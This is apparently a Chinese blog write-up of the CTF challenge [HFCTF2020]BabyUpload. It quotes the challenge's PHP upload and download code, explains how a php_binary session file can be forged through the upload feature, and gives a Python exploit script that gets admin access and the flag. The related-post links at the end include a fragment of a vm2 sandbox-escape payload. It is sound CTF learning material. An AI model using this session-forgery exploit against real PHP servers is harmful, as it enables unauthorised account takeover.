[HFCTF2020]BabyUpload

最新推荐文章于 2023-03-22 19:00:38 发布
最新推荐文章于 2023-03-22 19:00:38 发布
阅读量198 收藏
点赞数
分类专栏: BUUCTF 文章标签: 基础练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127683577
版权 
知识点:session 反序列化( php_binary处理器 )

分析

两个条件 $_SESSION['username']为admin ,且 /var/babyctf/success.txt文件存在。

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}

上传功能,对我们的文件名做了加密,格式为 name_hashfile ,这格式不就是 session 的文件名格式,且它设置的 session 保存路径和我们的上传路径是一样的,那么思路就有了,通过上传 session 格式的文件,且这个文件解析后的 username 值为 admin ,那么这个的 session 处理器是什么呢?

$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;              //$dir_path = /var/babyctf/$_POST['attr']
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}
if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
}

这边就需要下载功能了,可以通过 filename 参数来下载它默认的 username ,看一下格式

elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

这种格式就是 php_binary 处理器 ,然后伪造 admin ,再传一个 success.txt 文件就可以了
在这里插入图片描述

exp

import requests
import hashlib

url = 'http://95068bbf-0b6b-4f2a-990d-179e2bb6e7b5.node4.buuoj.cn:81/'
# 上传伪造的session文件
files = {"up_file": ("sess", b'\x08usernames:5:"admin";')}
data = {
    'direction': 'upload',
    'attr': ''
}
req = requests.post(url, data=data, files=files)

# 获取session_id
session_id = hashlib.sha256(b'\x08usernames:5:"admin";').hexdigest()

#在/var/babyctf/下创建success.txt目录
data1 = {
    'attr': 'success.txt',
    'direction': 'upload'
}
req1 = requests.post(url=url, data=data1, files=files)

#通过伪造的session文件解析,获取flag
cookie = {
    'PHPSESSID': session_id
}

flag = requests.get(url, cookies=cookie)
print(flag.text)
succ3
关注
专栏目录
---已搬运----BUUCTF:[HFCTF2020]BabyUpload sess_ file_exist()可 检测 目录和文件 。 sha256加密, PHP代码审计
Zero_Adam的博客
04-08 679
目录:一、自己做:1. 本地先试一试1. direction = upload & attr != private2. direction == upload & attr ==private3.direction=download & attr = (private)已经存在的 & filename =必须是完整文件名4.direction=download & attr = (not-private)已经存在的 & filename =必须是完整文件名2.
[刷题记录][HFCTF2020]BabyUpload
最新发布
qq_69209270的博客
09-27 140
漏了一个关键的点,session存储在和要求的success文件在同一个目录下,而且session的默认存储方式就是sess_PHPSESSID,我们直接利用download读取它,进行伪造。第一个很好弄,猜测就是可以传入cookie什么的,但是第二个该路径中要含有success.txt,既然题目要求,那就不可能有这个文件,所以要由我们自己创建。题目运用session伪造和文件上传,将原来的session修改为admin,上传success.txt,使得服务器满足所有条件,从而获得flag。
buuxtf [HFCTF2020]BabyUpload
qq_52671379的博客
04-09 1274
buuxtf [HFCTF2020]BabyUpload
[HFCTF2020]EasyLogin -wp
freerats的博客
07-29 2338
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js 访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。 在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞 这里需要对koa框架的目录有一定的了解 其中controllers目录是项目控制器存放目录:接受请求,处理逻辑 访问controllers/api.js发现处理逻辑 const crypto = require('.
虎符2020CTF web easylogin.pdf
04-20
从提供的文件内容来看,这篇文档主要讨论了虎符2020CTF (Capture The Flag) 比赛中Web类题目“easylogin”的解题过程。CTF比赛是一种信息安全竞赛,参赛者需要通过解决各种信息安全挑战来获得相应的flag,即密码或...
[HFCTF2022]ezphp
snowlyzz的博客
10-24 2636
FastCgi 缓存文件加载恶意so
[HFCTF2020]BabyUpload 1
读书 买花 长大
02-01 534
[HFCTF2020]BabyUpload 1
[HFCTF2020]BabyUpload session解析引擎
qq_54929891的博客
07-05 1304
对于代码的解析如上,获取flag的途径:1、session中的username参数要为admin2、在 /var/babyctf/success.txt存在在代码审查中可以得到的信息点: 在php中,session文件默认的存储文件名是sess_PHPSESSID,于是我们可以利用donwnload先看一下原先的session文件里面有什么,经过分析可以知道$attr参数我们可以暂时设置为空,因为目前感觉跟我们的操作没多大关系 可以发现有一个不可见字符,不同的php引擎,session的存储方式不一
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session反序列化
u013119911的博客
06-30 1583
点开就是源代码,直接进行代码审计
HFCTF2020 web writeup
a3320315的博客
04-21 3096
easy_login just_escape 进入这个页面 然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示 我们输入Error().stack 可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤 所以我们使用字符串拼接就可以了~~ 然后我们去网上找一下关于vm2的payload 所以最终的payload为: (function (...
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1137
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 520
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
buu刷题(4)
qq_62046696的博客
03-22 576
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
[HFCTF2020]EasyLogin
K1ose的博客
03-24 424
访问页面,是个登录界面,view-source也没看到啥提示; 在注册界面view-source,看到一个js文件; 打开来看看,是js源码泄露; /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val(); const password = $("#password").val(); const token
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值